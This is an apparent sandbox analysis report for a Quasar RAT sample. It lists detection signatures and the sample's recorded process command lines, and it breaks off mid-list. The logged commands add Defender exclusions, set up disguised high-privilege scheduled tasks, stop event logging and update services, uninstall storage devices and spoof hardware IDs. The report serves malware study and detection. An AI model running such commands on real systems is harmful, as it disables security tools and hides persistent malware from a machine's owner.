Analysis Overview
SHA256
01e185ad6cba8440d1fa1d5c5ea5802d346ae7fabbe1c57115e4135b84420a7f
Threat Level: Known bad
The file 0c0dc0cf41e3c993ae5a22803275949abin.zip was found to be: Known bad.
Malicious Activity Summary
Quasar payload
Quasar RAT
Process spawned unexpected child process
Nirsoft
Creates new service(s)
Stops running service(s)
Executes dropped EXE
Checks computer location settings
Loads dropped DLL
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Suspicious use of NtSetInformationThreadHideFromDebugger
Launches sc.exe
Unsigned PE
Enumerates physical storage devices
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Creates scheduled task(s)
Runs ping.exe
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-01-05 11:47
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-01-05 11:46
Reported
2024-01-05 11:49
Platform
win7-20231215-en
Max time kernel
0s
Max time network
147s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Creates new service(s)
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2380 wrote to memory of 1204 | N/A | C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe | C:\Users\Admin\AppData\Local\Temp\svchost.exe |
| PID 2380 wrote to memory of 1204 | N/A | C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe | C:\Users\Admin\AppData\Local\Temp\svchost.exe |
| PID 2380 wrote to memory of 1204 | N/A | C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe | C:\Users\Admin\AppData\Local\Temp\svchost.exe |
| PID 2380 wrote to memory of 1204 | N/A | C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe | C:\Users\Admin\AppData\Local\Temp\svchost.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe
"C:\Users\Admin\AppData\Local\Temp\18425dae9f0a49097d0abdd28ec465bfe2f4161b7849fb28494b8058a18ebcfc.exe"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: NZME-9H4D
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\Program Files\Google\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Recovery\7cc3d2c2-9b96-11ee-ab98-e6b52eba4e86\dllhost.exe'" /f
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\s3KUFe101b.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\audiodg.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\7cc3d2c2-9b96-11ee-ab98-e6b52eba4e86\dllhost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\TAPI\System.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft Sync Framework\wininit.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Google\conhost.exe'
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\audiodg.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 6 /tr "'C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\audiodg.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Recovery\7cc3d2c2-9b96-11ee-ab98-e6b52eba4e86\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\7cc3d2c2-9b96-11ee-ab98-e6b52eba4e86\dllhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\Windows\TAPI\System.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Windows\TAPI\System.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\Windows\TAPI\System.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Microsoft Sync Framework\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Sync Framework\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft Sync Framework\wininit.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files\Google\conhost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\Program Files\Google\conhost.exe'" /f
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "USBSTOR*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "STORAGE*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SCSI\Disk*" /use_wildcard""
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "SWD\WPDBUSENUM*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk&*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "disk"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "G:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "F:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "E:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "D:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "C:\"
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "Disk drive*" /use_wildcard""
C:\ProgramData\Microsoft\Windows\DevManView.exe
C:\\ProgramData\\Microsoft\\Windows\\DevManView.exe /uninstall "WAN Miniport*" /use_wildcard""
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Disk.bat
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: NZME-9H4D
C:\Users\Admin\AppData\Roaming\conhost_sft.exe
"C:\Users\Admin\AppData\Roaming\conhost_sft.exe"
C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe
"C:\Users\Admin\AppData\Roaming\sp_hyperRuntimedhcpSvc.exe"
C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe
"C:\Users\Admin\AppData\Roaming\HpsrSpoof.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAYwBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAbQBtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAbQBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAZQB4ACMAPgA="
C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe
"C:\Users\Admin\AppData\Local\Temp\SPOOFER.exe"
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\Recovery\7cc3d2c2-9b96-11ee-ab98-e6b52eba4e86\dllhost.exe
"C:\Recovery\7cc3d2c2-9b96-11ee-ab98-e6b52eba4e86\dllhost.exe"
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 728449HP-TRGT32560MST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 328445HP-TRGT21812DQ
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 628445HP-TRGT21812FU
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 428445HP-TRGT21812FA
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 528445HP-TRGT21812SL
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 828445HP-TRGT21812SG
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 228445HP-TRGT21812RV
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 28445HP-TRGT21812AB
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 728465HP-TRGT20767MST
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 628465HP-TRGT20767FU
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 328465HP-TRGT20767DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 528465HP-TRGT20767SL
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 428465HP-TRGT20767FA
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 828465HP-TRGT20767SG
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 228465HP-TRGT20767RV
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\ProgramData\VC_redist.x64.exe
C:\ProgramData\VC_redist.x64.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "driverupdate"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 328481HP-TRGT8973DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 728481HP-TRGT8973MST
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 628481HP-TRGT8973FU
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 528481HP-TRGT8973SL
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 428481HP-TRGT8973FA
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 828481HP-TRGT8973SG
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 228481HP-TRGT8973RV
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 28481HP-TRGT8973AB
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "driverupdate"
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 28465HP-TRGT20767AB
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: 9V2B-R0ZF
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: 9V2B-R0ZF
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: TUI8-L1C8
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: TUI8-L1C8
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: G82R-D9F0
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: G82R-D9F0
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: PIP3-VJPS
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: PIP3-VJPS
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: F7M2-8LDT
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: F7M2-8LDT
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: Z4KU-N2GK
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: Z4KU-N2GK
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: SME3-DE0M
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: SME3-DE0M
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: 3V13-NN1U
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: 3V13-NN1U
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: GT39-ME29
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: GT39-ME29
C:\ProgramData\Microsoft\Windows\Volumeid64.exe
C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: 9UN0-L18O
C:\Windows\System32\cmd.exe
